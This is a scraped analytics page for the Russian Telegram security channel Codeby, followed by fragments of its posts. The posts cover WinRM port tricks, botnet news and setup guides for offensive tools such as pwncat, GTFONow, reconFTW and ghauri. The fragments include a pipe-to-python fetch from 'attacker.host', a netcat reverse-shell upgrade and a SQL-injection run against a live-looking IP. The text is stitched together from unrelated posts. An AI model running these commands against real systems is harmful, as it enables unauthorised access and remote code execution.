Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
Show more📈 Analytical overview of Telegram channel Codeby
Channel Codeby (@codeby_sec) in the Russian language segment is an active participant. Currently, the community unites 36 595 subscribers, ranking 3 747 in the Technologies & Applications category and 17 795 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 36 595 subscribers.
According to the latest data from 10 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 201 over the last 30 days and by 15 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 7.67%. Within the first 24 hours after publication, content typically collects 4.14% reactions from the total number of subscribers.
- Post reach: On average, each post receives 2 805 views. Within the first day, a publication typically gains 1 514 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 20.
- Thematic interests: Content is focused on key topics such as edr, api, вектор, mitre, att&ck.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
Thanks to the high frequency of updates (latest data received on 11 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
Стоит отметить, что данный продукт получил соответствие требованиям ФСТЭК по 4 уровню доверия (УД4) достаточно быстро. Ранее компания уменьшила срок прохождения испытаний ФСТЭК с 6 месяцев до 3.На фоне глобальных новостей по поводу импортзамещений данный релиз выглядит очень хорошим, и его использование совместно с другими платформами виртуализации поможет закрыть большинство технических мер защиты виртуальных сред. #новости
POST /wsman 443 – 45.12.67.18 HTTP/1.1 Ruby+WinRM+Client+(2.8.3,+ruby+2.7.2+(2020-10-01))Как видно из запроса, использовался некоторый клиент для WinRM, написанный на Ruby. Но интересно тут указание порта 443, ведь WinRM работает на 5985, 5986 портах. 💻WinRM — это название как службы, так и протокола Windows, использующегося для удаленного управления, администрирования и мониторинга систем. Обычно используется злоумышленниками для перемещения в инфраструктуре жертвы. ⬇️Оказывается с помощью представленных ниже команд можно сконфигурировать WinRM так, чтобы в дополнении к стандартным портам добавлялись порты 80, 443. ⏺️winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} ⏺️winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} ✏️ Используя эту особенность, злоумышленники могут ввести в заблуждение исследователей безопасности, мимикрируя под обычный трафик в инфраструктуре.
🗣️ Когда злоумышленники получают доступ к персональной, финансовой или коммерческой информации, последствия для бизнеса могут быть разрушительными: от потери клиентов до временной остановки бизнес-процессов.Методы кражи данных, которые используют мошенники: 🔸Фишинг: Создание фейковых сайтов и поддельных писем, чтобы обманом получить у сотрудников доступ к данным. 🔸Брутфорс-атаки: Автоматический подбор паролей для доступа к аккаунтам и хранилищам. 🔸Программы-шпионы: Вирусы, которые внедряются в операционные системы и незаметно отправляют данные злоумышленникам. ✉️ Какие данные могут быть украдены? Чаще всего атакуют персональные данные клиентов, финансовые сведения, бизнес-информацию, а также предметы интеллектуальной собственности, такие как патенты и разработки. 5 признаков уязвимости информации в компании: 🔸Высокая текучка сотрудников. 🔸Постоянные командировки с использованием рабочей техники. 🔸Активное взаимодействие с контрагентами, требующее обмена данными. 🔸Сложная IT-инфраструктура с распределёнными правами доступа. 🔸Обслуживание техники в сторонних сервисах. В условиях, когда утечки данных могут затронуть любую компанию, важно принимать активные меры по защите информации, обучать сотрудников и контролировать все возможные каналы утечки. ➡️ Читать подробнее в блоге
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
⚙️ Режимы:
# Single Target
sudo ./reconftw.sh -d target.com -r
# List of Targets
sudo ./reconftw.sh -l sites.txt -r -o /output/directory/
# Yolo mod (all tasks)
sudo ./reconftw.sh -d target.com -a
#Deep scan
./reconftw.sh -d target.com -r --deep -o /output/directory/
# Recon in a multi domain target
./reconftw.sh -m company -l domains_list.txt -r
🔥 Некоторые возможности:
# Osint Domain information Emails addresses and passwords leaks Metadata finder API leaks search # Subdomains Certificate transparency NOERROR subdomain discovery Bruteforce Permutations JS files & Source Code Scraping DNS Records # Hosts IP info CDN checker WAF checker Port Scanner Port services vulnerability checks Password spraying Geolocalization info # Webs Web Prober Web screenshoting Web templates scanner CMS Scanner Url extraction Favicon Real IP Fuzzing Wordlist generation Passwords dictionary creation # Vulnerability checks XSS Open redirect SSRF CRLF Cors LFI Checks SQLi Check SSTI SSL tests 4XX Bypasser💻 Home 💻 Mindmap
tar -xvzf webtty_0.5.1_Linux_x86_64.tar.gz
🔸Запустим утилиту
./webtty
⚙️ После запуска происходит генерация данных для подключения, которые необходимо скопировать в браузер по приведенной выше ссылке. Далее полученный ответ в браузере копируем на сервер и получаем соединение!python gtfonow.py [OPTIONS]
python gtfonow.py --command 'ls -la' --level 2 --risk 2
curl http://attacker.host/gtfonow.py | python
💻 Homenc 1.1.1.1 4444
remote$ python -c "import pty; pty.spawn('/bin/bash')"
remote$ Ctrl + Z
local$ stty raw -echo
local$ fg
Надоело ? Мне тоже
Установка:
python3 -m venv pwncat-env
source pwncat-env/bin/activate
pip install pwncat-cs
Основные опции:
# Connect to a bind shell
pwncat-cs 10.10.10.10:4444
# Listen for reverse shell
pwncat-cs -lp 4444
# Connect via ssh
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10
# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222
# Reconnect utilizing installed persistence
# If reconnection fails and no protocol is specified,
# SSH is used as a fallback.
pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
Табы работают, по Ctrl + C сессия не рвется. Переключение между режимами(local <> remote) Ctrl + D Есть полезные фичи как Upload с хоста на жертву, так и наоборот Download. Модули escalate и enumerate для ленивых❗️ Вывод suid'ных бинарников
run enumerate types=file.suid❗️ Задействует все режимы
run enumerate💻 Download ❕ Docs
🗣️ Недавний отчет показал, что Androxgh0st теперь использует компоненты от ботнета Mozi, расширяя своё влияние на устройства интернета вещей (IoT) и возможное сотрудничество между двумя ботнетами.Ключевые уязвимости, на которые нацелен Androxgh0st: 🔸 CVE-2017-9841 в PHPUnit, дающий бэкдор-доступ к вебсайтам 🔸 CVE-2018-15133 в Laravel, позволяющий выполнить зашифрованный код 🔸 CVE-2021-41773 в Apache, позволяющий атаки обхода путей Mozi, ранее активно использовавший уязвимости в IoT-устройствах, таких как маршрутизаторы и DVR, был разгромлен в 2021 году. Однако Androxgh0st, судя по последним данным командных логов, внедрил Mozi-загрузки в свою инфраструктуру, что делает его ещё более опасным для IoT-среды. #новости
pip3 install git+https://github.com/GreyDGL/PentestGPT
🔸 Импорт ключа
Для корректной работы нам понадобится ключ для доступа к API OpenAI
shell export OPENAI_API_KEY='<your key here>'
🔸 Проверка работоспособности
pentestgpt-connection
🔸 Запуск утилиты
pentestgpt --reasoning_model=gpt-4-turbo
После всех проделанных шагов вы можете начать общение с дообученым помощником, который может самостоятельно проводить базовые проверкиBoolean based Error Based Time Based Stacked QueriesПоддерживаемые СУБД:
MySQL Microsoft SQL Server Postgres OracleПоддерживаемые типы:
GET/POST Headers Cookies Mulitipart Form data JSON SOAP/XMLДобавлена поддержка:
--sql-shell
--proxy
⚙️ Установка и запуск:
git clone https://github.com/r0oth3x49/ghauri.git
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
Available now! Telegram Research 2025 — the year's key insights 
